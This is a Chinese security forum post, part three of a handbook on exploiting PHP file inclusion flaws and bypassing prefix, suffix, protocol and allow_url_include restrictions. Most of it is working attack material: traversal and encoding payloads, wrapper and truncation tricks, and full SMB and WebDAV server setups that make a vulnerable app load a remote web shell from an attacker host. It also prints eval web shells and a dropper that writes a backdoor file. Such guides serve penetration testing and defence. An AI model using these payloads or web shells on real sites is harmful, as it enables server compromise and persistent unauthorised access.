安全矩阵

 找回密码
 立即注册
搜索
查看: 4672|回复: 0

PHP文件包含漏洞利用思路与Bypass总结手册(三)

[复制链接]

46

主题

165

帖子

731

积分

高级会员

Rank: 4

积分
731
发表于 2020-5-6 23:31:18 | 显示全部楼层 |阅读模式
绕过姿势

我们平常很多时候碰到的情况肯定不会是简单的include $_GET['file'];这样直接把变量传入包含函数的。在很多时候包含的变量/文件不是完全可控的。

现在代码常做的限制有这些:


  1. 1、指定前缀
  2. 2、指定后缀
  3. 3、协议限制
  4. 4、allow_url_fopen=Off
复制代码

Bypass-指定前缀

测试代码:

  1. <?php
  2.         $file = $_GET['file'];
  3.         include '/var/www/html/'.$file;
  4. ?>
复制代码
一般情况下,这种前缀也是很常见的,限制用户访问www服务外的其他文件。下面就看看有哪些方式可以绕过这个限制。


LFI-目录遍历

利用条件:../ 未被过滤

利用姿势

  1. include.php?file=../../../etc/passwd
复制代码

LFI-编码绕过

很多时候后台代码都会对用户输入的数据进行检测过滤,常见的就是在敏感字符前加 \ 进行转义,但通过编码可以绕过它的检测。

url编码:

../

  1. %2e%2e%2f
  2. ..%2f
  3. %2e%2e/
复制代码

..\

  1. %2e%2e%5c
  2. ..%5c
  3. %2e%2e\
复制代码

二次编码:

../

  1. %252e%252e%252f
复制代码

..\

  1. %252e%252e%255c
复制代码

某些web容器支持的编码方式:

../

  1. ..%c0%af
复制代码


PS:Why does Directory traversal attack %C0%AF work?

  1. %c0%ae%c0%ae/
复制代码

PS:java中会把”%c0%ae”解析为”\uC0AE”,最后转义为ASCCII字符的”.”(点)

..\

  1. ..%c1%9c
复制代码
Bypass-指定后缀

测试代码:

  1. <?php
  2.         $file = $_GET['file'];
  3.         include $file.'/test/index.php';
  4. ?>
复制代码

一般情况下,这种类似后缀也是很常见的,限制用户的访问。下面就看看有哪些方式可以绕过这个限制。

RFI-URL

url格式

  1. protocol://hostname[:port]/path/[;parameters][?query]#fragment
复制代码

在远程文件包含漏洞(RFI)中,可以利用query或fragment来绕过后缀限制。

利用姿势1:query(?)

  1. index.php?file=http://192.33.6.145/phpinfo.txt?
复制代码

则包含的文件为

  1. http://192.33.6.145/phpinfo.txt?/test/index.php
复制代码

问号后面的部分/test/index.php,也就是指定的后缀被当作query从而被绕过。

利用姿势2:fragment(#)

  1. index.php?file=http://192.33.6.145/phpinfo.txt%23
复制代码

则包含的文件为

  1. http://192.33.6.145/phpinfo.txt%23/test/index.php
复制代码

问号后面的部分/test/index.php,也就是指定的后缀被当作fragment从而被绕过。注意需要把#进行url编码为%23。

LFI-压缩协议

利用条件

  1. 1、php >= 5.3.0

  2. 2、已知限制
复制代码

利用姿势:依据限制构造特定zip包

利用测试代码,依据限制构造特定压缩包:





利用phar协议:

payload
  1. index.php?file=phar://qftm.zip/qftm

  2. index.php?file=phar:///var/www/html/FI/qftm.zip/qftm
复制代码
实际上包含为:
  1. index.php?file=phar://qftm.zip/qftm/test/index.php

  2. index.php?file=phar:///var/www/html/FI/qftm.zip/qftm/test/index.php
复制代码


相对路径 Linux Centos7


绝对路径 Linux Centos7



利用zip协议:

payload

  1. index.php?file=zip://qftm.zip%23qftm

  2. index.php?file=zip:///var/www/html/FI/qftm.zip%23qftm
复制代码


实际上包含为:
  1. index.php?file=zip://qftm.zip%23qftm/test/index.php

  2. index.php?file=zip:///var/www/html/FI/qftm.zip%23qftm/test/index.php
复制代码


相对路径 Linux Centos7


绝对路径 Linux Centos7



LFI-长度截断


利用条件:php < 5.2.8


利用姿势:

目录字符串
  1. Windows下目录最大长度为256字节,超出的部分会被丢弃

  2. Linux下目录最大长度为4096字节,超出的部分会被丢弃
复制代码
./ 适用于 windows Linux
  1. index.php?file=././././。。。省略。。。././file.txt
复制代码


./达到一定值(受系统和文件名-奇偶性的综合影响)时,则限制后缀会被直接丢弃掉。




LFI-零字节截断

利用条件

  1. php < 5.3.4
  2. magic_quotes_gpc=Off
复制代码

利用姿势

  1. index.php?file=phpinfo.txt%00
复制代码


php version 5.3.4 时已修复 零字节截断漏洞


Bypass-协议限制data://

如果在我们使用文件包含漏洞时data://协议被限制,但是我们又想要使用的话该怎么绕过,比如下面这段限制代码


  1. <?php
  2.    
  3.         error_reporting(0);
  4.         $filename = $_GET['filename'];
  5.         if (preg_match("/\bdata\b/iA", $filename)) {
  6.             echo "stop hacking!!!!\n";
  7.         }
  8.         else{
  9.         include $filename;
  10.         }
  11. ?>
复制代码

分析代码可知filename变量内容开头不能出现data字符串,这就限制了data://协议的使用,不过我们可以利用zlib协议嵌套的方法绕过data://协议的限制。

利用姿势

  1. index.php?filename=compress.zlib://data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
复制代码

限制

绕过


Bypass-allow_url_include

对于RFI的缺陷,先来看一下PHP针对allow_url_fopen和allow_url_include的配置说明php7.x -> php.ini

  1. ;;;;;;;;;;;;;;;;;;
  2. ; Fopen wrappers ;
  3. ;;;;;;;;;;;;;;;;;;

  4. ; Whether to allow the treatment of URLs (like http:// or ftp://) as files.
  5. ; http://php.net/allow-url-fopen
  6. allow_url_fopen=On

  7. ; Whether to allow include/require to open URLs (like http:// or ftp://) as files.
  8. ; http://php.net/allow-url-include
  9. allow_url_include=Off
复制代码

从配置中可以看到 allow_url_fopen和allow_url_include主要是针对两种协议起作用:http://、 ftp://。

PHP针对RFI URL包含限制主要是利用allow_url_include=Off来实现,将其设置为Off,可以让PHP不加载远程HTTP或FTP URL,从而防止远程文件包含攻击。那么,我们是不是可以这样想,有没有什么其它协议可以让我们去包含远程服务器文件,答案是肯定的,例如SMB、WebDAV等协议。

既然这样,攻击者就可以利用这个缺陷,使用相应的协议进行Bypass。在这个过程中,即使allow_url_fopen和allow_url_include都设置为Off,PHP也不会阻止相应的远程文件加载。

RFI-SMB

测试代码

  1. <?php
  2.         $file=$_GET['file'];
  3.         include($file);
  4. ?>
复制代码

攻击原理

  1. unc -> smb
复制代码

攻击场景

当易受攻击的PHP应用程序代码尝试从受攻击者控制的SMB共享加载PHP Web shell时,SMB共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的SMB服务器。因此,一旦易受攻击的应用程序尝试从SMB共享访问PHP Web shell,SMB服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。

环境配置

  • PHP环境设置

首先,在受害者主机上配置php.ini,将allow_url_fopen和allow_url_include设置为Off

然后重启服务查看phpinfo()配置是否生效

  • SAMBA服务器环境配置

使用匿名读取访问权限配置SAMBA服务器

  1. Samba是在Linux和UNIX系统上实现SMB协议的一个软件
复制代码

安装SAMBA服务器:

  1. apt-get install samba
复制代码

创建SMB共享目录和 php web shell:

  1. mkdir /var/www/html/pub/
  2. touch /var/www/html/pub/shell.php
复制代码

配置新创建的SMB共享目录的权限:

  1. chmod 0555 /var/www/html/pub/
  2. chown -R nobody:nogroup /var/www/html/pub/
复制代码

  1. [global]
  2. workgroup = WORKGROUP
  3. server string = Samba Server %v
  4. netbios name = indishell-lab
  5. security = user
  6. map to guest = bad user
  7. name resolve order = bcast host
  8. dns proxy = no
  9. bind interfaces only = yes

  10. [Qftm]
  11. path = /var/www/html/pub
  12. writable = no
  13. guest ok = yes
  14. guest only = yes
  15. read only = yes
  16. directory mode = 0555
  17. force user = nobody
复制代码

重新启动SAMBA服务器以应用配置文件/etc/samba/smb.conf中的新配置

  1. service smbd restart
复制代码

成功重新启动SAMBA服务器后,尝试访问SMB共享并确保SAMBA服务器不要求凭据。

Getshell

在环境都配置完之后,利用samba目录/var/www/html/pub中共享的WebShell进行GetShell

unc->payload

  1. http://127.0.0.1/FI/index.php?file=\\192.33.6.145\qftm\shell.php
复制代码

shell.php

  1. <?php @eval($_POST['admin']);?>
复制代码

蚁剑连接

Get shell:

SMB总结

针对smb利用的局限性,因为这种unc只能是在windows下使用,而且,smb端口(445)在国内已经被封杀的差不多了(勒索病毒!!!),很难应用到实际中,但是其他的像webdav这种同理也是可以被包含的,且利用的价值更大。

RFI-WebDAV

WebDAV(Web 分布式创作和版本管理)是一项基于 HTTP/1.1 协议的通信协议。它扩展了HTTP/1.1 协议,在Get、Post、Put、Delete 等HTTP标准方法外添加了新方法,使应用程序可对Web Server直接读写,并支持写文件锁定(Locking)和解锁(Unlock),以及文件的版本控制。

PHP在远程匿名加载WebDAV所共享的文件时并不会对其进行拦截。

测试代码

  1. <?php
  2.         $file=$_GET['file'];
  3.         include $file;
  4. ?>
复制代码

攻击原理

  1. 类unc -> WebDAV
复制代码

攻击场景

当易受攻击的PHP应用程序代码尝试从攻击者控制的WebDAV服务器共享加载PHP Web shell时,WebDAV共享应该允许访问该文件。攻击者需要在其上配置具有匿名浏览访问权限的WebDAV服务器。因此,一旦易受攻击的应用程序尝试从WebDAV共享访问PHP Web shell,WebDAV服务器将不会要求任何凭据,易受攻击的应用程序将包含Web shell的PHP代码。

环境配置

同SMB环境配置一样,首先,重新配置PHP环境,在php.ini文件中禁用allow_url_fopen以及allow_url_include。然后,配置WebDAV服务器。

  • PHP环境设置

首先,在受害者主机上配置php.ini,将allow_url_fopen和allow_url_include设置为Off

然后重启服务查看phpinfo()配置是否生效

  • WebDAV服务器环境配置

需要使用匿名读取访问权限配置WebDAV服务器。

1、Ubuntu18.04手动搭建WebDAV服务器

(1)安装Apache Web服务器

  1. sudo apt-get install -y apache2
复制代码

(2)在Apache配置中启用WebDAV模块

  1. sudo a2enmod dav
  2. sudo a2enmod dav_fs
复制代码

(3)创建WebDAV共享目录webdav和 php web shell

  1. sudo mkdir -p /var/www/html/webdav
  2. sudo touch /var/www/html/webdav/shell.php
复制代码

(4)将文件夹所有者更改为您的Apache用户,www-data以便Apache具有对该文件夹的写访问权

  1. sudo chown -R www-data:www-data  /var/www/
复制代码

(5)编辑WebDAV配置文件 /etc/apache2/sites-available/000-default.conf

不需要启用身份验证

  1. DavLockDB /var/www/html/DavLock
  2. <VirtualHost *:80>
  3.         # The ServerName directive sets the request scheme, hostname and port that
  4.         # the server uses to identify itself. This is used when creating
  5.         # redirection URLs. In the context of virtual hosts, the ServerName
  6.         # specifies what hostname must appear in the request's Host: header to
  7.         # match this virtual host. For the default virtual host (this file) this
  8.         # value is not decisive as it is used as a last resort host regardless.
  9.         # However, you must set it for any further virtual host explicitly.
  10.         #ServerName www.example.com

  11.         ServerAdmin webmaster@localhost
  12.         DocumentRoot /var/www/html

  13.         # Available loglevels: trace8, ..., trace1, debug, info, notice, warn,
  14.         # error, crit, alert, emerg.
  15.         # It is also possible to configure the loglevel for particular
  16.         # modules, e.g.
  17.         #LogLevel info ssl:warn

  18.         ErrorLog ${APACHE_LOG_DIR}/error.log
  19.         CustomLog ${APACHE_LOG_DIR}/access.log combined

  20.         # For most configuration files from conf-available/, which are
  21.         # enabled or disabled at a global level, it is possible to
  22.         # include a line for only one particular virtual host. For example the
  23.         # following line enables the CGI configuration for this host only
  24.         # after it has been globally disabled with "a2disconf".
  25.         #Include conf-available/serve-cgi-bin.conf
  26.         Alias /webdav /var/www/html/webdav
  27.         <Directory /var/www/html/webdav>
  28.                 DAV On
  29.         </Directory>
  30. </VirtualHost>
复制代码

(6)重新启动Apache服务器,以使更改生效

  1. sudo service apache2 restart
复制代码

成功重新启动Apache服务器后,尝试访问WebDAV共享并确保WebDAV服务器不要求凭据。

除了上面在Ubuntu上一步步安装WebDAV服务器外,还可以利用做好的Docker镜像。

2、WebDAV Docker镜像

推荐使用Docker镜像方式去安装利用,免去一些因环境或配置不当而产生的问题

(1)拉取webdav镜像

镜像地址:https://hub.docker.com/r/bytemark/webdav

(2)用docker启动一个webdav服务器

  1. docker run -v ~/webdav:/var/lib/dav -e ANONYMOUS_METHODS=GET,OPTIONS,PROPFIND -e LOCATION=/webdav -p 80:80 --rm --name webdav bytemark/webdav
复制代码

(3)在~/webdav/data目录里面共享自己php脚本

(5)验证Webdav服务器

浏览器验证

终端验证

Getshell

在环境都配置完且验证之后,利用webdav目录~/webdav/data中共享的WebShell进行GetShell

类unc->payload

  1. http://127.0.0.1/FI/index.php?file=//172.17.0.2//webdav/shell.php
复制代码

shell.php

  1. <?php echo eval(system("whoami"));phpinfo();?>
  2. <?PHP fputs(fopen('poc.php','w'),'<?php @eval($_POST[Qftm])?>');?>
复制代码

为什么这个不能直接加载一句话木马呢,因为使用PHP文件包含函数远程加载Webdav共享文件时,不能附加消息(GET/POST),但是我们可以自定义shell.php,通过服务器加载远程shell.php给我们自动生成一个Webshell。

请求构造的payload

从图中可以看到远程加载shell.php利用成功,可以根据状态码分析其加载过程:

其中code 207是由WebDAV(RFC 2518)扩展的状态码,代表之后的消息体将是一个XML消息,并且可能依照之前子请求数量的不同,包含一系列独立的响应代码。

  • 蚁剑连接

连接远程加载shell.php生成的Webshell->poc.shell

WebDAV总结

webdav如今很多人都将其作为自己的个人数据共享存储服务器,其局限性远远小于SMB。


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-11-28 02:32 , Processed in 0.017263 second(s), 19 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表